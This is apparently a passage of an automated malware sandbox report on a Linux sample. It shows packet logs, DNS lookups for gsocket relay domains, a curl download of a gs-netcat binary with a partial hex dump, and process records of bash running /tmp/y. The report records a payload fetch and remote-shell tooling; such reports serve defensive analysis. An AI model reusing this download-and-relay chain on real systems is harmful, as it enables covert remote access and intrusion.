                                                Oct 1, 2024 11:12:04.371155977 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.375837088 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.375848055 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.375858068 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.376787901 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.405591965 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.405601025 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.405616999 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.410167933 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.410175085 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.411185026 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.411190033 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.417814970 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.444276094 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.444289923 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.444303989 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.448904037 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.448913097 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.448925018 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.449995995 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.480786085 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.480803967 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.487533092 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.487550974 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.489381075 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.489393950 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.494800091 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.523459911 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.523477077 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.523489952 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.528424978 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.528435946 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.529406071 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.529416084 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.529426098 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.534090996 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.559328079 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.559335947 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.564302921 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.564311981 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.565246105 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.565252066 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.570029020 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.596080065 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.596095085 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.596107960 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.600886106 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.600898027 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.601926088 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.601933002 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.601943016 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.606848955 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.631129980 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.631144047 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.635751963 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.635761976 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.635771036 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.636820078 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.664975882 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.664987087 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.665003061 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.669579983 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.669589043 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.670593977 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.670605898 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.675470114 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.700359106 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.700368881 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.700380087 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.705286026 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.705297947 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.705312967 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.706235886 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.706243992 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.711025953 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.733550072 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.733558893 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.733575106 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.737695932 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.737706900 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.738923073 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.769973040 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.769984961 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.770003080 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.775490999 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.775501966 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.775516987 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.776628971 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.776635885 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.781210899 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.804785013 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.804791927 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.804807901 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.809705019 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.809712887 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.810822964 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.810828924 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.815561056 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.839783907 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.839791059 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.839801073 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.844574928 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.844582081 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.844593048 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.845555067 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.875663996 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.875670910 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.875695944 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.881206036 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.881216049 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.882364988 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.882370949 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.887202024 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.911364079 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.911374092 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.911392927 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.916126013 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.916134119 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.916145086 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.917102098 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.939290047 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.939296007 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.944019079 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.944025040 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.944900990 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.944905996 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.949563980 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.979986906 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.980009079 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.980026007 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.986017942 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.986033916 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.987409115 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:05.123198986 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:05.123235941 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:05.791184902 CEST4251680192.168.2.23109.202.202.202
                                                Oct 1, 2024 11:12:06.188422918 CEST40962443192.168.2.2345.14.164.3
                                                Oct 1, 2024 11:12:06.188467026 CEST4434096245.14.164.3192.168.2.23
                                                Oct 1, 2024 11:12:06.188554049 CEST40962443192.168.2.2345.14.164.3
                                                Oct 1, 2024 11:12:06.190553904 CEST40962443192.168.2.2345.14.164.3
                                                Oct 1, 2024 11:12:06.190568924 CEST4434096245.14.164.3192.168.2.23
                                                Oct 1, 2024 11:12:06.190618992 CEST4434096245.14.164.3192.168.2.23
                                                Oct 1, 2024 11:12:18.589545965 CEST43928443192.168.2.2391.189.91.42
                                                Oct 1, 2024 11:12:30.875556946 CEST42836443192.168.2.2391.189.91.43
                                                Oct 1, 2024 11:12:37.018595934 CEST4251680192.168.2.23109.202.202.202
                                                Oct 1, 2024 11:12:59.543272972 CEST43928443192.168.2.2391.189.91.42
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 1, 2024 11:12:01.748332977 CEST5294053192.168.2.231.1.1.1
                                                Oct 1, 2024 11:12:01.748333931 CEST5537453192.168.2.231.1.1.1
                                                Oct 1, 2024 11:12:01.769576073 CEST53553741.1.1.1192.168.2.23
                                                Oct 1, 2024 11:12:01.772747993 CEST53529401.1.1.1192.168.2.23
                                                Oct 1, 2024 11:12:06.176281929 CEST5772753192.168.2.231.1.1.1
                                                Oct 1, 2024 11:12:06.187695026 CEST53577271.1.1.1192.168.2.23
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 1, 2024 11:12:01.748332977 CEST192.168.2.231.1.1.10xd4d4Standard query (0)cdn.gsocket.ioA (IP address)IN (0x0001)false
                                                Oct 1, 2024 11:12:01.748333931 CEST192.168.2.231.1.1.10x9ac3Standard query (0)cdn.gsocket.io28IN (0x0001)false
                                                Oct 1, 2024 11:12:06.176281929 CEST192.168.2.231.1.1.10xdf7fStandard query (0)c.gs.thc.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 1, 2024 11:12:01.772747993 CEST1.1.1.1192.168.2.230xd4d4No error (0)cdn.gsocket.io92.60.39.208A (IP address)IN (0x0001)false
                                                Oct 1, 2024 11:12:06.187695026 CEST1.1.1.1192.168.2.230xdf7fNo error (0)c.gs.thc.org45.14.164.3A (IP address)IN (0x0001)false
                                                • cdn.gsocket.io
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.233807692.60.39.208443
                                                TimestampBytes transferredDirectionData
                                                2024-10-01 09:12:02 UTC109OUTGET /bin/gs-netcat_mini-linux-x86_64 HTTP/1.1
                                                Host: cdn.gsocket.io
                                                User-Agent: curl/7.68.0
                                                Accept: */*
                                                2024-10-01 09:12:02 UTC656INHTTP/1.1 200 OK
                                                Server: nginx/1.22.1
                                                Date: Tue, 01 Oct 2024 09:12:02 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 2833840
                                                Connection: close
                                                Last-Modified: Tue, 03 Sep 2024 17:11:09 GMT
                                                Access-Control-Allow-Origin: *
                                                ETag: "66d7432d-2b3db0"
                                                expires: Tue, 01 Oct 2024 09:03:11 GMT
                                                Cache-Control: max-age=600
                                                x-proxy-cache: MISS
                                                X-GitHub-Request-Id: 489F:29B81:3FCBB30:418D9E6:66FBB877
                                                Accept-Ranges: bytes
                                                Via: 1.1 varnish
                                                Age: 530
                                                X-Served-By: cache-fra-etou8220078-FRA
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1727773923.679676,VS0,VE6
                                                Vary: Accept-Encoding
                                                X-Fastly-Request-ID: c4ea6cfcabcc332a3c2e8e5f48dd02b482de74c7
                                                2024-10-01 09:12:02 UTC15728INData Raw: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 03 00 3e 00 01 00 00 00 b9 3c 04 00 00 00 00 00 40 00 00 00 00 00 00 00 70 37 2b 00 00 00 00 00 00 00 00 00 40 00 38 00 08 00 40 00 19 00 18 00 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 de 27 00 00 00 00 00 04 de 27 00 00 00 00 00 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00 70 e2 27 00 00 00 00 00 70 e2 47 00 00 00 00 00 70 e2 47 00 00 00 00 00 18 54 03 00 00 00 00 00 30 76 04 00 00 00 00 00 00 00 20 00 00 00 00 00 02 00 00 00 06 00 00 00 80 dd 2a 00 00 00 00 00 80 dd 4a 00 00 00 00 00 80 dd 4a 00 00 00 00 00 80 01 00 00 00 00 00 00 80 01 00 00 00 00 00 00 08 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00
                                                Data Ascii: ELF><@p7+@8@'' p'pGpGT0v *JJ
                                                2024-10-01 09:12:02 UTC16384INData Raw: da 49 1e 00 00 00 00 00 b8 21 48 00 00 00 00 00 08 00 00 00 00 00 00 00 e8 26 1e 00 00 00 00 00 c8 21 48 00 00 00 00 00 08 00 00 00 00 00 00 00 10 27 1e 00 00 00 00 00 d8 21 48 00 00 00 00 00 08 00 00 00 00 00 00 00 f1 49 1e 00 00 00 00 00 e8 21 48 00 00 00 00 00 08 00 00 00 00 00 00 00 09 4a 1e 00 00 00 00 00 f8 21 48 00 00 00 00 00 08 00 00 00 00 00 00 00 22 4a 1e 00 00 00 00 00 08 22 48 00 00 00 00 00 08 00 00 00 00 00 00 00 40 4a 1e 00 00 00 00 00 18 22 48 00 00 00 00 00 08 00 00 00 00 00 00 00 4a 4a 1e 00 00 00 00 00 28 22 48 00 00 00 00 00 08 00 00 00 00 00 00 00 58 4a 1e 00 00 00 00 00 38 22 48 00 00 00 00 00 08 00 00 00 00 00 00 00 73 4a 1e 00 00 00 00 00 48 22 48 00 00 00 00 00 08 00 00 00 00 00 00 00 8e 4a 1e 00 00 00 00 00 58 22 48 00 00 00 00
                                                Data Ascii: I!H&!H'!HI!HJ!H"J"H@J"HJJ("HXJ8"HsJH"HJX"H
                                                2024-10-01 09:12:02 UTC16384INData Raw: 08 00 00 00 00 00 00 00 a0 b5 1e 00 00 00 00 00 b8 59 48 00 00 00 00 00 08 00 00 00 00 00 00 00 78 87 1e 00 00 00 00 00 c8 59 48 00 00 00 00 00 08 00 00 00 00 00 00 00 c0 b4 1e 00 00 00 00 00 d8 59 48 00 00 00 00 00 08 00 00 00 00 00 00 00 78 87 1e 00 00 00 00 00 e8 59 48 00 00 00 00 00 08 00 00 00 00 00 00 00 20 bc 1e 00 00 00 00 00 f8 59 48 00 00 00 00 00 08 00 00 00 00 00 00 00 70 8a 1e 00 00 00 00 00 08 5a 48 00 00 00 00 00 08 00 00 00 00 00 00 00 00 9c 1e 00 00 00 00 00 18 5a 48 00 00 00 00 00 08 00 00 00 00 00 00 00 98 8a 1e 00 00 00 00 00 28 5a 48 00 00 00 00 00 08 00 00 00 00 00 00 00 60 9b 1e 00 00 00 00 00 38 5a 48 00 00 00 00 00 08 00 00 00 00 00 00 00 10 8b 1e 00 00 00 00 00 48 5a 48 00 00 00 00 00 08 00 00 00 00 00 00 00 c0 9a 1e 00 00 00 00
                                                Data Ascii: YHxYHYHxYH YHpZHZH(ZH`8ZHHZH
                                                2024-10-01 09:12:02 UTC16384INData Raw: 60 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 e8 75 1f 00 00 00 00 00 70 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 dd 5b 20 00 00 00 00 00 78 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 9a ee 1e 00 00 00 00 00 88 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 ea 75 1f 00 00 00 00 00 98 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 b8 ee 1e 00 00 00 00 00 a0 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 c1 ee 1e 00 00 00 00 00 b0 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 ed 75 1f 00 00 00 00 00 c0 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 d2 ee 1e 00 00 00 00 00 c8 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 78 92 1f 00 00 00 00 00 d8 9f 48 00 00 00 00 00 08 00 00 00 00 00 00 00 f0 75 1f 00 00 00 00 00 e8 9f 48 00 00 00 00 00 08 00 00 00 00 00 00
                                                Data Ascii: `HupH[ xHHuHHHuHHxHuH
                                                2024-10-01 09:12:02 UTC16384INData Raw: 13 7d 1f 00 00 00 00 00 00 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 07 ff 1e 00 00 00 00 00 08 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 07 ff 1e 00 00 00 00 00 18 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 1c 7d 1f 00 00 00 00 00 28 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 20 ff 1e 00 00 00 00 00 30 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 20 ff 1e 00 00 00 00 00 40 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 25 7d 1f 00 00 00 00 00 50 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 3e ff 1e 00 00 00 00 00 58 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 3e ff 1e 00 00 00 00 00 68 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 2e 7d 1f 00 00 00 00 00 78 c4 48 00 00 00 00 00 08 00 00 00 00 00 00 00 5b ff 1e 00 00 00 00 00 80 c4 48 00 00 00 00
                                                Data Ascii: }HHH}(H 0H @H%}PH>XH>hH.}xH[H
                                                2024-10-01 09:12:02 UTC16384INData Raw: 08 00 00 00 00 00 00 00 f5 0e 1f 00 00 00 00 00 f8 e7 48 00 00 00 00 00 08 00 00 00 00 00 00 00 f5 0e 1f 00 00 00 00 00 08 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 b0 83 1f 00 00 00 00 00 18 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 06 0f 1f 00 00 00 00 00 20 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 06 0f 1f 00 00 00 00 00 30 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 b4 83 1f 00 00 00 00 00 40 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 19 0f 1f 00 00 00 00 00 48 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 19 0f 1f 00 00 00 00 00 58 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 b8 83 1f 00 00 00 00 00 68 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 2d 0f 1f 00 00 00 00 00 70 e8 48 00 00 00 00 00 08 00 00 00 00 00 00 00 2d 0f 1f 00 00 00 00
                                                Data Ascii: HHH H0H@HHHXHhH-pH-
                                                2024-10-01 09:12:03 UTC16384INData Raw: 00 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 68 21 1f 00 00 00 00 00 10 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 3d 88 1f 00 00 00 00 00 20 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 81 21 1f 00 00 00 00 00 28 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 81 21 1f 00 00 00 00 00 38 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 46 88 1f 00 00 00 00 00 48 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 94 21 1f 00 00 00 00 00 50 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 a1 21 1f 00 00 00 00 00 60 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 4e 88 1f 00 00 00 00 00 70 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 af 21 1f 00 00 00 00 00 78 0d 49 00 00 00 00 00 08 00 00 00 00 00 00 00 af 21 1f 00 00 00 00 00 88 0d 49 00 00 00 00 00 08 00 00 00 00 00 00
                                                Data Ascii: Ih!I= I!(I!8IFHI!PI!`INpI!xI!I
                                                2024-10-01 09:12:03 UTC16384INData Raw: 50 31 1f 00 00 00 00 00 30 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 59 31 1f 00 00 00 00 00 50 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 62 31 1f 00 00 00 00 00 58 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 6b 31 1f 00 00 00 00 00 68 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 e3 8d 1f 00 00 00 00 00 78 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 87 31 1f 00 00 00 00 00 80 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 90 31 1f 00 00 00 00 00 90 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 eb 8d 1f 00 00 00 00 00 a0 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 aa 31 1f 00 00 00 00 00 a8 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 a0 a1 1f 00 00 00 00 00 b8 32 49 00 00 00 00 00 08 00 00 00 00 00 00 00 f3 8d 1f 00 00 00 00 00 c8 32 49 00 00 00 00
                                                Data Ascii: P102IY1P2Ib1X2Ik1h2Ix2I12I12I2I12I2I2I
                                                2024-10-01 09:12:03 UTC16384INData Raw: 08 00 00 00 00 00 00 00 20 18 12 00 00 00 00 00 10 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 a0 17 12 00 00 00 00 00 58 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 a0 18 12 00 00 00 00 00 68 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 b0 17 12 00 00 00 00 00 88 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 d0 1c 12 00 00 00 00 00 90 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 50 1d 12 00 00 00 00 00 98 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 b0 1b 12 00 00 00 00 00 b8 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 50 1b 12 00 00 00 00 00 f0 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 70 1a 12 00 00 00 00 00 f8 61 49 00 00 00 00 00 08 00 00 00 00 00 00 00 20 1a 12 00 00 00 00 00 40 62 49 00 00 00 00 00 08 00 00 00 00 00 00 00 10 19 12 00 00 00 00
                                                Data Ascii: aIXaIhaIaIaIPaIaIPaIpaI @bI
                                                2024-10-01 09:12:03 UTC16384INData Raw: 98 a3 49 00 00 00 00 00 08 00 00 00 00 00 00 00 c8 60 21 00 00 00 00 00 c8 a3 49 00 00 00 00 00 08 00 00 00 00 00 00 00 d5 60 21 00 00 00 00 00 d8 a3 49 00 00 00 00 00 08 00 00 00 00 00 00 00 e0 60 21 00 00 00 00 00 08 a4 49 00 00 00 00 00 08 00 00 00 00 00 00 00 ec 60 21 00 00 00 00 00 18 a4 49 00 00 00 00 00 08 00 00 00 00 00 00 00 fb 60 21 00 00 00 00 00 28 a4 49 00 00 00 00 00 08 00 00 00 00 00 00 00 09 61 21 00 00 00 00 00 38 a4 49 00 00 00 00 00 08 00 00 00 00 00 00 00 14 61 21 00 00 00 00 00 48 a4 49 00 00 00 00 00 08 00 00 00 00 00 00 00 1c 61 21 00 00 00 00 00 58 a4 49 00 00 00 00 00 08 00 00 00 00 00 00 00 2f 61 21 00 00 00 00 00 68 a4 49 00 00 00 00 00 08 00 00 00 00 00 00 00 3a 61 21 00 00 00 00 00 78 a4 49 00 00 00 00 00 08 00 00 00 00 00 00
                                                Data Ascii: I`!I`!I`!I`!I`!(Ia!8Ia!HIa!XI/a!hI:a!xI


                                                System Behavior

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:/usr/bin/bash /tmp/y
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c
                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/sed
                                                Arguments:sed s/[^a-zA-Z0-9]/\\\\&/g
                                                File size:121288 bytes
                                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                Start time (UTC):09:11:56
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
